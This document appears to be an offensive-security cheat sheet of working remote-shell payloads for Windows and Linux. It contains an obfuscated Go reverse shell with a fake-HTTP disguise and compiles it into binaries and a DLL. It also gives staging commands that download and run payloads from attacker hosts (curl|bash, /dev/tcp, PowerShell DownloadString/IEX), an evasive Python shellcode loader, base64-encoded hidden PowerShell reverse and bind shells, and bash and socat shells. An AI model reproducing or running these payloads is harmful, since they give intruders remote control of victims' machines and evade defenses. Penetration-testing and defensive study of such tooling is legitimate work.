Shells

Generic

Golang Windows & Linux reverse shell

package main

import (
  "C"
  "bufio"
  "errors"
  "flag"
  "fmt"
  "net"
  "os"
  "os/exec"
  "path/filepath"
  "runtime"
  "time"
)

var dst string
var abc []string = []string{"a", "e", "b", "c", "s", "/"}
var webreq string = "GET /" + "george" + "/kindness HTTP/1.1\r\nHost:" + " reynolds.s3.amazonaws.com\r\nUser-Agent:" + " strawberry/0.2.1\r\nAccept:" + " application/json\r\n\r\n"

func GardnerFileExist(filePath string) bool {
  _, error := os.Stat(filePath)
  return !errors.Is(error, os.ErrNotExist)
}

//export EdwardsDial
func EdwardsDial() {
  conn, err := net.Dial("t"+"c"+"p", dst)
  if err != nil {
    time.Sleep(time.Duration(1000 * time.Millisecond))
    EdwardsDial()
    return
  }
  fmt.Fprintf(conn, webreq)              // Fake HTTP Request
  bufio.NewReader(conn).ReadString('\n') // Wait for any response
  bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1]}
  if runtime.GOOS != "windows" {
    bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[2] + abc[0] + abc[4] + "h", "-" + "i"}
    if GardnerFileExist(bin[0]) { // Check if file exist
      testbin := []string{abc[5] + "u" + abc[4] + "r" + abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + abc[3] + "r" + "i" + "p" + "t", abc[5] + "d" + abc[1] + "v" + abc[5] + "n" + "u" + "l" + "l", "-" + "q" + abc[3], bin[0]}
      if GardnerFileExist(testbin[0]) {
        bin = testbin
      }
    } else {
      bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + "h"}
    }
  }
  cmd := exec.Command(bin[0], bin[1:]...)
  cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn
  cmd.Run()
}

//export PalmerDetach
func PalmerDetach() {
  cwd, _ := os.Getwd()
  if runtime.GOOS == "windows" {
    cwd, file := filepath.Split(os.Args[0])
    bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1], abc[5] + abc[3], abc[4] + "t" + abc[0] + "r" + "t", abc[5] + abc[2], file, "-" + "-" + "child"}
    cmd := exec.Command(bin[0], bin[1:]...)
    cmd.Dir = cwd
    cmd.Start()
    cmd.Wait()
  } else {
    cmd := exec.Command(os.Args[0], "-"+"-"+"child")
    cmd.Dir = cwd
    cmd.Start()
    time.Sleep(time.Duration(1000 * time.Millisecond))
    cmd.Process.Release()
    time.Sleep(time.Duration(1000 * time.Millisecond))
  }
}

func main() {
  var isChild = flag.Bool("child", false, "run as child")
  flag.Parse()
  if !*isChild {
    PalmerDetach() // Detach program from parent terminal
  } else {
    EdwardsDial() // ReverseShell part
  }
  os.Exit(1)
}
LHOST="192.168.45.245"
LPORT=53
env GOOS=linux GOARCH=amd64 CGO_ENABLED=0 /usr/local/go/bin/go build -o r -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=386 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r32.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go
env GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -ldflags "-s -w -X main.dst=$LHOST:$LPORT" -buildmode=c-shared -o r.dll main.go
sudo mv r.exe r32.exe r.dll r /var/www/html/

cat <<EOF|sudo tee /var/www/html/r.sh
cd \$(mktemp -d)
curl $LHOST/r -o r || wget $LHOST/r
chmod 755 r;./r
EOF

sudo tail -n 0 -f /var/log/nginx/*.log &
sudo nc -nvlp 53 -s $LHOST
# Windows
(New-Object Net.WebClient).DownloadFile("http://1.2.3.4/r.exe","$env:TEMP\r.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\r.exe"

powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps -NoNewWindow $env:TEMP\r.exe"

# Linux
curl 1.2.3.4/r.sh|bash

# Linux - without curl/wget
nc -lvnp 7777 < /var/www/html/r # Wait for victim, then cancel to close connection
F="/dev/shm/r";cat</dev/tcp/127.0.0.1/7777>$F;chmod 755 $F;$F

# Windows x86 shellcode
CMD='powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps $env:TEMP\r.exe"'
msfvenom -a x86 --platform Windows -p windows/exec CMD="$CMD" -f python -b "\x00\x20" --smallest -v shellcode EXITFUNC=thread

DLL loader example
package main

import (
  "flag"
  "fmt"
  "syscall"
)

func main() {
  var mod = syscall.NewLazyDLL("main.dll")
  var isChild = flag.Bool("child", false, "run as child")
  var proc = mod.NewProc("EdwardsDial")
  flag.Parse()
  if !*isChild {
    proc = mod.NewProc("PalmerDetach")
  }
  ret, _, _ := proc.Call()
  fmt.Printf("Return: %d\n", ret)
}

Windows

PowerShell Python Reverse TCP (web stagged)

You need embeddable python zip at https://www.python.org/downloads/windows/ and to serve it as python.zip

cat <<’EOF’| sudo tee /var/www/html/rs.ps1 $ip=”192.168.1.163”; $port=53; $process=”powershell.exe” $python=”http://$ip/python.zip”; $dir=”$env:TEMP”;$Exists = Test-Path “$dirpython";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,”$dirpython.zip”);Add-Type -assembly “system.io.compression.filesystem”;[io.compression.zipfile]::ExtractToDirectory(“$dirpython.zip”, “$dirpython")} $arguments=@(“-c”,”””import time,socket,os,threading,subprocess as sp;p=sp.Popen([‘$process’],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect((‘$ip’,$port));threading.Thread(target=exec,args=(‘while(True):o=os.read(p.stdout.fileno(),1024);s.send(o);time.sleep(0.01)’,globals()),daemon=True).start();threading.Thread(target=exec,args=(‘while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i);time.sleep(0.01)’,globals())).start()”””) Start-Process -NoNewWindow -FilePath “$dirpythonpython.exe” -ArgumentList $arguments EOF

sudo nc -nvlp 53 -s 192.168.1.163
      cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0
      IEX(New-Object Net.WebClient).downloadString('http://192.168.1.163/rs.ps1')
      EOF

      powershell -E AAAAAAAAAAAAAA==
# Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "AAAAAAAAAAAAAA=="

ShellCode w/ python (web stagged)

cat <<'EOF'| xxd -plain | tr -d '\n' | rev | sudo tee /var/www/html/loadsc
import ctypes as c
import gzip
import io
import urllib.request as r
def load(url):
  k32 = c.windll.kernel32
  k32.VirtualAlloc.restype = c.c_void_p
  ct = k32.CreateThread
  ct.argtypes = ( c.c_int, c.c_int, c.c_void_p, c.c_int, c.c_int, c.POINTER(c.c_int) )
  ct.restype = c.c_void_p
  buff = bytes.fromhex(gzip.open(io.BytesIO(r.urlopen(url).read()),'rb').read()[::-1].decode("utf-8"))
  lenbuff = len(buff)
  space = k32.VirtualAlloc(c.c_int(0),c.c_int(lenbuff),c.c_int(0x3000),c.c_int(0x40))
  buff = ( c.c_char * lenbuff ).from_buffer_copy( buff )
  k32.RtlMoveMemory(c.c_void_p(space),buff,c.c_int(lenbuff))
  buff = "" ; del buff
  handle = ct(c.c_int(0),c.c_int(0),c.c_void_p(space),c.c_int(0),c.c_int(0),c.pointer(c.c_int(0)))
  k32.WaitForSingleObject(handle, -1);
EOF
Call it with python
&$env:TEMP\python\python.exe -c "import urllib.request as r;exec(bytes.fromhex(r.urlopen('http://192.168.1.163/loadsc').read()[::-1].decode('utf-8')));load('http://192.168.1.163/sc')"

Or call it with Start-Process if you don’t want interaction (this payload download python.zip as well)
cat <<'EOF'| sudo tee /var/www/html/loadsc.ps1
$ip="192.168.45.245"; $loadsc="http://$ip/loadsc"; $sc="http://$ip/sc"
$python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")}
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF

# IEX(New-Object Net.WebClient).downloadString('http://192.168.45.245/loadsc.ps1')

Use donut to “convert” your exe to shellcode
pip3 install donut-shellcode --break-system-packages
python3 -c "import donut; donut.create(file='SweetPotato.exe',output='/tmp/sc',params='--help')"
cat /tmp/sc | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null

# test : msfvenom -p windows/x64/exec CMD="calc.exe" -f raw | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null

PowerShell Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443
# Generate PowerShell command to execute on target
export LHOST="4.3.2.1"
export LPORT="443"
echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo '
$c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT')
$s=$c.GetStream()
$sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ")
$s.Write($sb,0,$sb.Length)
[byte[]]$b=0..65535|%{0}
while(($i=$s.Read($b,0,$b.Length)) -ne 0){
 $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i)
 $sb=(iex $d | Out-String) 2>&1
 $sb2=$sb+"PS "+(pwd).Path+"> "
 $sb=([Text.Encoding]::UTF8).GetBytes($sb2)
 $s.Write($sb,0,$sb.Length)
 $s.Flush()
}
$c.Close()
' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n"
# Result Example
powershell -nop -noni -w Hidden -ep Bypass -e CgAkAGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAiADQALgAzAC4AMgAuADEAIgAsADQANAAzACkACgAkAHMAPQAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkACgAkAHMAYgA9ACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAUABTACAAIgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAiAD4AIAAiACkACgAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgBbAGIAeQB0AGUAWwBdAF0AJABiAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQAKAHcAaABpAGwAZQAoACgAJABpAD0AJABzAC4AUgBlAGEAZAAoACQAYgAsADAALAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7AAoAIAAkAGQAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAHQAIABUAGUAeAB0AC4AVQBUAEYAOABFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACQAaQApAAoAIAAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApACAAMgA+ACYAMQAKACAAJABzAGIAMgA9ACQAcwBiACsAIgBQAFMAIAAiACsAKABwAHcAZAApAC4AUABhAHQAaAArACIAPgAgACIACgAgACQAcwBiAD0AKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGIAMgApAAoAIAAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgAgACQAcwAuAEYAbAB1AHMAaAAoACkACgB9AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAAoA

PowerShell Reverse TCP (web stagged)

# Attacker Listen 443
sudo nc -nvlp 443
# Serving PS ReverseShell on http://*:80/rs.ps1
LHOST="4.3.2.1"
LPORT="443"
cd $(mktemp -d) && \
echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \
sudo python3 -m http.server --cgi 80
:: Victim, retrieve and launch rs.ps1
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1')

PowerShell bind shell


cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0
$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',8888);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
EOF
# powershell.exe -E JABsAGkAcwB0AGUAbgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAJwAwAC4AMAAuADAALgAwACcALAA4ADgAOAA4ACkAOwAkAGwAaQBzAHQAZQBuAGUAcgAuAHMAdABhAHIAdAAoACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgACQAbABpAHMAdABlAG4AZQByAC4AQQBjAGMAZQBwAHQAVABjAHAAQwBsAGkAZQBuAHQAKAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA7ACQAbABpAHMAdABlAG4AZQByAC4AUwB0AG8AcAAoACkACgA=
# nc 1.2.3.4 8888

Linux

Bash Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443
# Victim Connect 443
bash -c "bash -i >& /dev/tcp/4.3.2.1/443 0>&1"

Socat Bind TCP Shell (encrypted)

Etablish an encrypted bind shell with socat and a certificate (pub+key)
# Victim - Regroup cert and key
cat server.key server.crt > server.pem

# Victim - Listen 443
sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash

# Attacker - Connect 443
socat - OPENSSL:10.11.0.4:443,verify=0   #Skip certificate check